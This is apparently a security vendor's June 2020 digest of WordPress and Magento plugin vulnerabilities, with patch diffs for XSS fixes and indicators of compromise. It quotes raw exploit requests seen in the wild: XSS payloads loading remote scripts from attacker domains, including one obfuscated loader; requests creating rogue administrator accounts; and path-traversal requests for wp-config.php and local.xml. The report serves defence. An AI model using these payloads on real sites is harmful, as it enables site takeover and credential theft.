Vulnerabilities Digest: June 2020

Highlights for June 2020

• Cross site scripting is still the most common vulnerability in WordPress Plugins. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
• Massive local file inclusion (LFI) attempts have been discovered attempting to harvest WordPress and Magento credentials.
• Attackers continue to target old plugins with known vulnerabilities in an ongoing malware campaign targeting WordPress websites.

Details for these highlights can be found under the components listed below.

Relevant Plugins and Vulnerabilities:

YITH Woocommerce Ajax Product Filter 

Two weeks ago, we reported a Cross Site Scripting in Yith Woocommerce Ajax Product Filter caused by an improper handling of user input. This vulnerability requires user interaction to be exploited but a successful attack could lead to the execution of malicious scripts.

Patch (version 3.11.1):

Index: yith-woocommerce-ajax-navigation/trunk/widgets/class.yith-wcan-navigation-widget.php
===================================================================
         public function ajax_print_terms() {
-            $type      = $_POST['value'];
-            $attribute = $_POST['attribute'];
-            $return    = array( 'message' => '', 'content' => $_POST );
+            $unsanitize_posted_data = $_POST;
+            $posted_data            = array();
+
+            foreach ( $unsanitize_posted_data as $k => $v ){
+                $posted_data[ $k ] = esc_html( $v );
+            }
+
+            $type        = $posted_data['value'];
+            $attribute   = $posted_data['attribute'];
+            $post_id     = $posted_data['id'];
+            $name        = $posted_data['name'];
+            $return      = array( 'message' => '', 'content' => $posted_data );
 
             $terms = yith_wcan_wp_get_terms( array( 'taxonomy' => 'pa_' . $attribute, 'hide_empty' => '0' ) );
@@ -1027,6 +1036,6 @@
                     $type,
                     $attribute,
-                    $_POST['id'],
-                    $_POST['name'],
+                    $post_id,
+                    $name,

Successful attacks force victims to execute unwanted actions when they’re authenticated within their user account. To protect against this vulnerability, we strongly encourage YITH WooCommerce Ajax Product Filter users to update their plugin to version 3.11.1 as soon as possible.

Coming Soon Page, Under Construction & Maintenance Mode

The plugin Coming Soon, which boasts over 1 million active installations,  fixed a stored cross site scripting (XSS) vulnerability caused by improper user input handling. A new plugin version 5.1.2. was released on June 24th to include improved user sanitization.

When exploited, this vulnerability allows attackers to perform arbitrary actions on the victim’s behalf, log keystrokes, steal login credentials or session cookies, and other malicious behavior.

Patch (version 5.1.2):

Index: coming-soon/trunk/themes/default/functions.php
===================================================================
--- a/coming-soon/trunk/themes/default/functions.php
+++ b/coming-soon/trunk/themes/default/functions.php
@@ -57,5 +57,5 @@
 
     if ( !empty( $custom_css ) ) {
-        $output = '<style type="text/css">'.$custom_css.'</style>';
+        $output = '<style type="text/css">'.esc_html($custom_css).'</style>';
     }
 
@@ -271,5 +271,5 @@
 
     if ( !empty( $logo ) ) {
-        $output .= "<img id='seed-csp4-image' src='$logo'>";
+        $output .= "<img id='seed-csp4-image' src='".esc_attr($logo)."'>";
     }
 
@@ -284,5 +284,13 @@
 
     if ( !empty( $headline ) ) {
-        $output .= '<h1 id="seed-csp4-headline">'.str_replace("script","",$headline).'</h1>';
+        $output .= '<h1 id="seed-csp4-headline">'.wp_kses($headline,array(
+            'a' => array(
+                'href' => array(),
+                'title' => array()
+            ),
+            'br' => array(),
+            'em' => array(),
+            'strong' => array(),
+        )).'</h1>';
     }

Exploit Attempts Seen in the Wild

51.83.99.191 -- POST -- /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon -- action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&hook=general&logo_enable=on&logo_height=1&logo_width=1&rcsp_description=%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E&rcsp_headline=was+here&rcsp_logo_url=https%3A%2F%2Fave.cervantes.es%2Fsites%2Fdefault%2Ffiles%2Fdemocursos_aveglobal.jpg -- 

Versions 5.1.0 and lower are vulnerable and should be updated immediately to avoid exploitation.

Plugin Payloads in Ongoing Malware Campaign

Our team saw a number of new IPs and domains added to the same ongoing campaign that we’ve been following for the past few years, where bad actors leverage known vulnerabilities in WordPress components to redirect site visitors to various kinds of scam landing pages — including tech support scams, fake lottery wins, and malicious browser notifications.

Malicious Domains & Detected IPs

Two new malicious domains have been added to this ongoing campaign

• drop[.]dontstopthismusics[.]com
• claim@trainmysoldierg[.]best (malicious e-mail added)

The following IPs have also been associated with this ongoing campaign:

• 94.23.103.187
• 192.254.68.134
• 51.255.43.153
• 104.244.55.114
• 5.188.232.163
• 62.210.141.218
• 62.210.180.62

Exploit Attempts Seen in the Wild

104.244.55.114 - action=importJSONTable&data%5B0%5D%5Bcat_code%5D=price_table&data%5B0%5D%5Bcss%5D=&data%5B0%5D%5Bdate_created%5D=2020-03-06%2B13%3A01%3A26&data%5B0%5D%5Bhtml%5D=%3Cscript+type%3Dtext%2Fjavascript%3E%28function%28%29+%7B+var+elem+%3D+document.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+elem.type+%3D+String.from...skipped...l%5D=%25&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23666&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23fff&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23fff&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cscript+type%3Dtext%2Fjavascript%3E%28function%28%29+%7B+var+elem+%3D+document.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+elem.type+%3D+String.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+elem.src+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C100%2C114%2C111%2C112%2C46%2C100%2C111%2C110%2C116%2C115%2C116%2C111%2C112%2C116%2C104%2C105%2C115%2C109%2C117%2C115%2C105%2C99%2C115%2C46%2..skipped..B0%5D%5Bunique_id%5D=RQjyfqVX&data%5B0%5D%5Bview_id%5D=ptsBlock_998098&mod=tables&pl=pts&reqType=ajax&update_with_same_id=1 [20/Jun/2020] "POST /wp-admin/admin-ajax.php HTTP/1.1" 

192.254.68.134 - action=kiwi_social_share_set_option&args%5Bgroup%5D=users_can_register&args%5Bvalue%5D=1 [03/Jun/2020] "POST /wp-admin/admin-ajax.php HTTP/1.1"

192.254.68.134 - action=td_ajax_update_panel&wp_option%5Busers_can_register%5D=1 [06/Jun/2020] "POST /wp-admin/admin-ajax.php HTTP/1.1" 

94.23.103.187 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22users_can_register%22%2C%22value%22+%3A%221%22%7D&security= [03/Jun/2020] "POST /wp-admin/admin-ajax.php HTTP/1.1" 

51.255.43.153 - action=td_mod_register&bbp-forums-role=bbp_keymaster&email=claim%40trainmysoldierg.best&user=claimtrainnn [03/Jun/2020] "POST /wp-admin/admin-ajax.php HTTP/1.1" 4

51.255.43.153 - action=cp_add_subscriber&bbp-forums-role=bbp_keymaster&cp_set_user=administrator&message=hello&param%5Bemail%5D=claim%40trainmysoldierg.best [04/Jun/2020] "POST /wp-admin/admin-ajax.php HTTP/1.1" 

LFI Vulnerabilities Lead to Compromised WordPress & Magento Websites

This month, we detected thousands of single requests targeting known local file inclusion (LFI) vulnerabilities in old WordPress and Magento components. These vulnerabilities occur when an application uses the path to a file as input.

The primary indicator of compromise can be found as server-level requests to download the wp-config.php file

Our records indicate that these attacks surfaced in late May, but our team saw a spike in malicious requests during June, 2020. Successful attacks can lead to a full website compromise.

Exploit Attempts Seen in the Wild: WordPress

37.59.53.93 - - [28/Jun/2020] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php HTTP/1.1" 

89.223.47.201 - - [26/Jun/2020] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0"

94.23.103.187 - - [02/Jun/2020:03:44:00 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php HTTP/1.1"

94.23.103.187 - - [02/Jun/2020:03:43:59 +0000] "GET /wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php HTTP/1.1" 

62.210.79.219 -- GET -- /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php -- - -- 2020-06-03

62.210.79.219 -- GET -- /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php -- - -- 2020-06-03

[...]

Exploit Attempts Seen in the Wild: Magento

114.125.81.69 -- GET -- /magmi/web/download_file.php?file=../../app/etc/local.xml -- - -- 2020-06-29

114.125.81.69 -- GET -- /magmi-importer/web/download_file.php?file=../../app/etc/local.xml -- - -- 2020-06-29

114.125.81.69 -- GET -- /amfeed/main/download?file=../../../app/etc/local.xml -- - -- 2020-06-29

[...]

Public exploits already exist for all of the components listed above. Many other plugins are still under attack. You can check our previous lab notes for additional information from past reports.

We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.